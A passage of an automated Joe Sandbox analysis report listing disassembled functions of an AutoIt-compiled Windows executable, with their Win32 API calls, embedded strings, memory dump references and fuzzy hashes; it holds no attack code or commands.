Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 5d8e4b80e175648b8415919135da402b84c68077e360c7f5886121cfdab350dc
Instruction ID: fd6fe2a5e11435577421900dbba2c5c12503ba76cbbf241235dda76d109b6770
Opcode Fuzzy Hash: 5d8e4b80e175648b8415919135da402b84c68077e360c7f5886121cfdab350dc
Instruction Fuzzy Hash: 16A191706043419FCB54EF20C891AAAB7ABBF54310F10496DB8669B7D2DF31ED06CB85

Function 0066CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0066CF91
__swprintf.LIBCMT ref: 0066D032
_wcscmp.LIBCMT ref: 0066D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0066D09A
_wcscmp.LIBCMT ref: 0066D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0066D10D
GetDlgCtrlID.USER32(?), ref: 0066D15F
GetWindowRect.USER32(?,?), ref: 0066D195
GetParent.USER32(?), ref: 0066D1B3
ScreenToClient.USER32(00000000), ref: 0066D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0066D234
_wcscmp.LIBCMT ref: 0066D248
GetWindowTextW.USER32(?,?,00000400), ref: 0066D26E
_wcscmp.LIBCMT ref: 0066D282

Strings

%s%u, xrefs: 0066D02C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 36eb7d96bb2d25219ae37f9eaa5614ba0d0d0d3fcf03eba4c6c7a9bf216e28fd
Instruction ID: b3ddfcd33f4a583c6c8a662cb7ffb173455b549919f36689134f0281d01c293a
Opcode Fuzzy Hash: 36eb7d96bb2d25219ae37f9eaa5614ba0d0d0d3fcf03eba4c6c7a9bf216e28fd
Instruction Fuzzy Hash: 3BA1D171A04706AFD714DF64C894FEAF7AAFF44354F008619FA99D6280EB30EA45CB91

Function 0066D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0066D8EB
_wcscmp.LIBCMT ref: 0066D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0066D924
CharUpperBuffW.USER32(?,00000000), ref: 0066D941
_wcscmp.LIBCMT ref: 0066D95F
_wcsstr.LIBCMT ref: 0066D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0066D9A8
_wcscmp.LIBCMT ref: 0066D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0066D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0066DA28
_wcscmp.LIBCMT ref: 0066DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0066DA60
GetWindowRect.USER32(00000004,?), ref: 0066DAC9

Strings

ThumbnailClass, xrefs: 0066D9B3, 0066DA33
@, xrefs: 0066D8C6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: a84f671b47d97d8d58926bbd5432f9d81f6892808375be70c9739e429cbd8b00
Instruction ID: 48ae04508348175dca63c300ae2d8450f54ece7900ed6f89c86af41deb24e7ed
Opcode Fuzzy Hash: a84f671b47d97d8d58926bbd5432f9d81f6892808375be70c9739e429cbd8b00
Instruction Fuzzy Hash: 3C81D1716083469FDB00CF50C881FAA7BEAEF84314F04856EFD899A196EB30DD45CBA1

Function 0066D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0066D753

Strings

[ALL, xrefs: 0066D7F9
ALL, xrefs: 0066D7E7
CLASSNAME=, xrefs: 0066D790
[CLASS:, xrefs: 0066D7A3
[LAST, xrefs: 0066D800
REGEXP=, xrefs: 0066D768
[REGEXPTITLE:, xrefs: 0066D77B
HANDLE=, xrefs: 0066D74C
[ACTIVE, xrefs: 0066D740
LAST, xrefs: 0066D718
[HANDLE:, xrefs: 0066D75F
ACTIVE, xrefs: 0066D72E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c3886358206d0508b047a1e06d758597c11522f60c2ed61139676b1c3ec4e7e1
Instruction ID: 7c563c5b53a74a56fd61f984a3c6e52c1094090100953f20d5d2e4df0427ef9b
Opcode Fuzzy Hash: c3886358206d0508b047a1e06d758597c11522f60c2ed61139676b1c3ec4e7e1
Instruction Fuzzy Hash: CA31C131A4534AA6DB54FA51DD63FEDB3BB9F20754F31002DF842720D1EB61AE08C69A

Function 0066EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0066EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0066EAC2
SetWindowTextW.USER32(?,?), ref: 0066EAD9
GetDlgItem.USER32(?,000003EA), ref: 0066EAEE
SetWindowTextW.USER32(00000000,?), ref: 0066EAF4
GetDlgItem.USER32(?,000003E9), ref: 0066EB04
SetWindowTextW.USER32(00000000,?), ref: 0066EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0066EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0066EB45
GetWindowRect.USER32(?,?), ref: 0066EB4E
SetWindowTextW.USER32(?,?), ref: 0066EBB9
GetDesktopWindow.USER32 ref: 0066EBBF
GetWindowRect.USER32(00000000), ref: 0066EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0066EC12
GetClientRect.USER32(?,?), ref: 0066EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0066EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0066EC6F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: a08d74a0e5effbb26d75edd3af655435c0fa239fabaf2582e3d7b3350f1cc04f
Instruction ID: b7f3a4abd86387f7796e108d1dbd3e8b91a317694bffcd380fda5730fc9a3f24
Opcode Fuzzy Hash: a08d74a0e5effbb26d75edd3af655435c0fa239fabaf2582e3d7b3350f1cc04f
Instruction Fuzzy Hash: 63513F75900709EFDB20DFA8CE85FAEBBF6FF04704F004A28E556A66A0D775A945CB10

Function 006879B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 006879C6
LoadCursorW.USER32(00000000,00007F00), ref: 006879D1
LoadCursorW.USER32(00000000,00007F03), ref: 006879DC
LoadCursorW.USER32(00000000,00007F8B), ref: 006879E7
LoadCursorW.USER32(00000000,00007F01), ref: 006879F2
LoadCursorW.USER32(00000000,00007F81), ref: 006879FD
LoadCursorW.USER32(00000000,00007F88), ref: 00687A08
LoadCursorW.USER32(00000000,00007F80), ref: 00687A13
LoadCursorW.USER32(00000000,00007F86), ref: 00687A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00687A29
LoadCursorW.USER32(00000000,00007F85), ref: 00687A34
LoadCursorW.USER32(00000000,00007F82), ref: 00687A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00687A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00687A55
LoadCursorW.USER32(00000000,00007F02), ref: 00687A60
LoadCursorW.USER32(00000000,00007F89), ref: 00687A6B
GetCursorInfo.USER32(?), ref: 00687A7B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bf6c13c924c3f9c06f020ab49ead6534dbecc6b91e38ae1f8dd60a6f21c39b4f
Instruction ID: a2410108d5bf873e1dfd1b5915886df75eb4d9e3171447323790af508b471aa7
Opcode Fuzzy Hash: bf6c13c924c3f9c06f020ab49ead6534dbecc6b91e38ae1f8dd60a6f21c39b4f
Instruction Fuzzy Hash: 703136B0D0831A6ADB509FB68C8999FFFE9FF04750F50453AE50DE7280DA78A5008FA1

Function 0063C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0064E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0063C8B7,?,00002000,?,?,00000000,?,0063419E,?,?,?,006CDC00), ref: 0064E984

Part of subcall function 0063660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006353B1,?,?,006361FF,?,00000000,00000001,00000000), ref: 0063662F

__wsplitpath.LIBCMT ref: 0063C93E

Part of subcall function 00651DFC: __wsplitpath_helper.LIBCMT ref: 00651E3C

_wcscpy.LIBCMT ref: 0063C953
_wcscat.LIBCMT ref: 0063C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0063C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0063CABE

Part of subcall function 0063B337: _wcscpy.LIBCMT ref: 0063B36F

Strings

AU3!, xrefs: 0063C90C
Bad directive syntax error, xrefs: 006A3429
>>>AUTOIT SCRIPT<<<, xrefs: 006A311B
EA06, xrefs: 006A30C9
Unterminated string, xrefs: 006A3470
Error opening the file, xrefs: 006A30B4, 006A313D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 006A3098

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 1215ee99c31e810905a14ce79e77c824b54138f7a35584d0e1e56c1673ecde26
Instruction ID: 36226928e88caca7ee0b36433afb9362da76c95914922875c57e2cb8e099860c
Opcode Fuzzy Hash: 1215ee99c31e810905a14ce79e77c824b54138f7a35584d0e1e56c1673ecde26
Instruction Fuzzy Hash: 41128D715083419FC764EF24C891AAFBBE6AF99314F00491EF58AA3351DB30DE49CB96

Function 0069CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069CEFB
DestroyWindow.USER32(?,?), ref: 0069CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0069CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0069D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0069D025
DestroyWindow.USER32(?), ref: 0069D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00630000,00000000), ref: 0069D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0069D094
GetDesktopWindow.USER32 ref: 0069D0A9
GetWindowRect.USER32(00000000), ref: 0069D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0069D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0069D0DA

Part of subcall function 0064B526: GetWindowLongW.USER32(?,000000EB), ref: 0064B537

Strings

0, xrefs: 0069CF1B
tooltips_class32, xrefs: 0069CFED, 0069D06E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: bdec92005e4a77b083a7277901d643d55f8b4916fec05cbb4ddd87d206e5b36a
Instruction ID: 1078d6c3b7f4c7e427f6bd29db28ac2ab09352f6055a16a3ed1020c98b4c72ca
Opcode Fuzzy Hash: bdec92005e4a77b083a7277901d643d55f8b4916fec05cbb4ddd87d206e5b36a
Instruction Fuzzy Hash: 2A71AEB4140305AFDB24CF28CC85FB677EAEB89744F14452DF9858B2A1DB71E942CB22

Function 0069F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

DragQueryPoint.SHELL32(?,?), ref: 0069F37A

Part of subcall function 0069D7DE: ClientToScreen.USER32(?,?), ref: 0069D807
Part of subcall function 0069D7DE: GetWindowRect.USER32(?,?), ref: 0069D87D
Part of subcall function 0069D7DE: PtInRect.USER32(?,?,0069ED5A), ref: 0069D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0069F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0069F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0069F411
_wcscat.LIBCMT ref: 0069F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0069F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0069F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0069F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0069F4AA
DragFinish.SHELL32(?), ref: 0069F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0069F59C

Strings

@GUI_DROPID, xrefs: 0069F4D1
@GUI_DRAGID, xrefs: 0069F510
@GUI_DRAGFILE, xrefs: 0069F54B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: b689e8e795d2254922b11d979a0a6402a0c8ff5c98982d7538d51627a6a85120
Instruction ID: 5687f3f3c493c0569cb2de66d4c972ef0a651d88810073c6fc5eedd3cbf4ab3f
Opcode Fuzzy Hash: b689e8e795d2254922b11d979a0a6402a0c8ff5c98982d7538d51627a6a85120
Instruction Fuzzy Hash: 63616AB1108301AFC701DF64CC85DAFBBFAEF89710F400A2EF595961A1DB709A49CB52

Function 0067AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0067AB3D
VariantCopy.OLEAUT32(?,?), ref: 0067AB46
VariantClear.OLEAUT32(?), ref: 0067AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0067AC40
__swprintf.LIBCMT ref: 0067AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0067AC9C
VariantInit.OLEAUT32(?), ref: 0067AD4D
SysFreeString.OLEAUT32(00000016), ref: 0067ADDF
VariantClear.OLEAUT32(?), ref: 0067AE35
VariantClear.OLEAUT32(?), ref: 0067AE44
VariantInit.OLEAUT32(00000000), ref: 0067AE80

Strings

Default, xrefs: 0067ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0067AC6A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: d9a498206f0853b623e9d082954afeb62f1a099b0b07ac78fea09eeb4947bf83
Instruction ID: f818c487681094ee0999e355bd573343f903c3d2fdf932c6f09aa8e7834d6295
Opcode Fuzzy Hash: d9a498206f0853b623e9d082954afeb62f1a099b0b07ac78fea09eeb4947bf83
Instruction Fuzzy Hash: FFD1D371600215DBCB249F95C885BAEB7B7FF84B00F14C559F4099B281EB70EC45DBA6

Function 0069716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006971FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00697247

Strings

EXISTS, xrefs: 006972B0
GETTOTALCOUNT, xrefs: 0069722A
GETITEMCOUNT, xrefs: 00697311
SELECT, xrefs: 006973E0
ISCHECKED, xrefs: 006973B2
UNCHECK, xrefs: 0069740B
CHECK, xrefs: 00697267
COLLAPSE, xrefs: 0069728D
EXPAND, xrefs: 006972E1
GETSELECTED, xrefs: 0069733F
GETTEXT, xrefs: 00697382

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: da7753734a18f19ea5c7853ef13f8c5507d9a2aa80156f1afe429ba5c1eba862
Instruction ID: fb37b7b8e0fedd80d0a95d6006ef31730f443f77d4fdb27c7f24baa7f0b88eec
Opcode Fuzzy Hash: da7753734a18f19ea5c7853ef13f8c5507d9a2aa80156f1afe429ba5c1eba862
Instruction Fuzzy Hash: D69161706147019BCB44EF20C891AAEBBA7BF54310F10485DF8966B7A3DB71ED06CB99

Function 0066CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0066CF50), ref: 0066CE90

Strings

L+n, xrefs: 0066CD14
H+n, xrefs: 0066CCE8
4+n, xrefs: 0066CC96
CLASS, xrefs: 0066CC10
REGEXPCLASS, xrefs: 0066CC56
CLASSNN, xrefs: 0066CC33
TEXT, xrefs: 0066CDC7
INSTANCE, xrefs: 0066CD9E
NAME, xrefs: 0066CCC2
T+n, xrefs: 0066CD72
P+n, xrefs: 0066CD43

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+n$CLASS$CLASSNN$H+n$INSTANCE$L+n$NAME$P+n$REGEXPCLASS$T+n$TEXT
API String ID: 3555792229-792993196
Opcode ID: c72c4ad17e60068fc2c6f2b4fe9f5e4cb22c6e28f44c7db331c125a15b2aa1ba
Instruction ID: a706a1af3d1c31dcb0e49ec7a58bf683c561e2ec4680eed72c7f102a7c28879a
Opcode Fuzzy Hash: c72c4ad17e60068fc2c6f2b4fe9f5e4cb22c6e28f44c7db331c125a15b2aa1ba
Instruction Fuzzy Hash: 8491C130A00A46ABCB58DF60C481BFEFB77BF04324F508519E899A7251DF31695ADBE4

Function 0069E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0069E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0069BEAF), ref: 0069E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0069E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0069E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0069E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0069BEAF), ref: 0069E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0069E6DF
DestroyIcon.USER32(?,?,?,?,?,0069BEAF), ref: 0069E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0069E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0069E717

Part of subcall function 00650FA7: __wcsicmp_l.LIBCMT ref: 00651030

Strings

.dll, xrefs: 0069E564
.icl, xrefs: 0069E521
.exe, xrefs: 0069E541

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 3a444b1f8010c28b101a378ffbabf79cdf9e6706bf2a1a64c0c760c566fc968b
Instruction ID: 95f4b385a7987c096799366b98c93e4f5efd491e33f9cb90af6e1fc4b8f111cd
Opcode Fuzzy Hash: 3a444b1f8010c28b101a378ffbabf79cdf9e6706bf2a1a64c0c760c566fc968b
Instruction Fuzzy Hash: 7B61BEB1540215BAEF24DF64CC46BFE77AEAB18715F104219F911DA1D0EB71E980CBA0

Function 0067D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

CharLowerBuffW.USER32(?,?), ref: 0067D292
